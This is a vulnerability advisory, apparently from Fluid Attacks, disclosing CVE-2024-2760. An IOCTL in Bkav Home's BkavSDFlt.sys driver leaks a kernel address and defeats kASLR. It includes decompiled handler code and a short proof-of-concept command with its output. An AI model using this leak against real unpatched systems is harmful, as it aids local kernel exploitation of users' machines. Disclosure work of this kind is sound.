---
slug: advisories/kent/
title: Bkav Home v7816 - Kernel Memory Leak
authors: Andres Roldan
writer: aroldan
codename: kent
product: Bkav Home v7816, build 2403161130
date: 2024-04-22 12:00 COT
cveid: CVE-2024-2760
severity: 5.5
description: Bkav Home v7816, build 2403161130 - Kernel Memory Leak Vulnerability
keywords: Fluid Attacks, Security, Vulnerabilities, Leak, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

| | |
| --------------------- | ---------------------------------------------------------------------------------|
| **Name** | Bkav Home v7816, build 2403161130 - Kernel Memory Leak |
| **Code name** | [Kent](https://en.wikipedia.org/wiki/Stacey_Kent) |
| **Product** | Bkav Home |
| **Vendor** | Bkav Corporation |
| **Affected versions** | Version 7816, build 2403161130 |
| **State** | Public |
| **Release date** | 2024-04-22 |

## Vulnerability

| | |
| --------------------- | ----------------------------------------------------------------------------------------------------------------------------|
| **Kind** | Kernel Memory Leak |
| **Rule** | [037. Technical Information Leak](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-037/) |
| **Remote** | No |
| **CVSSv3 Vector** | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
| **CVSSv3 Base Score** | 5.5 |
| **Exploit available** | Yes |
| **CVE ID(s)** | [CVE-2024-2760](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2760) |

## Description

Bkav Home v7816, build 2403161130 is vulnerable to
a Memory Information Leak vulnerability by
triggering the `0x222240` IOCTL code of the
`BkavSDFlt.sys` driver.

## Vulnerability

The `0x222240` IOCTL code of the
`BkavSDFlt.sys` driver allows to leak
the kernel address of an global variable which has
always the same offset from the base module, making the
`kASLR` protection useless on that module.

The handling code of the `0x222240` IOCTL calls
`sub_1400010D8` which copies the absolute address
of a global variable into the output buffer
of the IRP object.

```c
__int64 __fastcall sub_1400010D8(PIRP pIrp, __int64 a2, __int64 *a3)
{
  unsigned int v3; // r9d
  __int64 v4; // rax

  v3 = 0;
  v4 = 0i64;
  if ( *(_DWORD *)(a2 + 0x10) < 8u )
  {
    v3 = 0xC0000023;
  }
  else
  {
    *(_QWORD *)pIrp->AssociatedIrp.SystemBuffer = &qword_140004230;
    v4 = 8i64;
  }
  *a3 = v4;
  return v3;
}
```

The PoC will dump the absolute address of such
global variable:

```powershell
PS C:\Users\admin\Desktop> .\IOCTLBruteForce.exe BkavSdFlt 0x222240
[+] 0x222240: (I & O) Bytes sent: 8 (0x8)
[+] 0x222240: Bytes returned: 8 (0x8)
[+] Output (0): FFFFF80044434230
```

## Our security policy

We have reserved the ID CVE-2024-2760 to refer
to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Bkav Home v7816, build 2403161130
* Operating System: Windows

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Andres Roldan](https://www.linkedin.com/in/andres-roldan/)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://www.bkav.com/>

**Product page** <https://www.bkav.com/bkav-home>

## Timeline

<time-lapse
discovered="2024-03-21"
contacted="2024-03-21"
disclosure="2024-04-22">
</time-lapse>
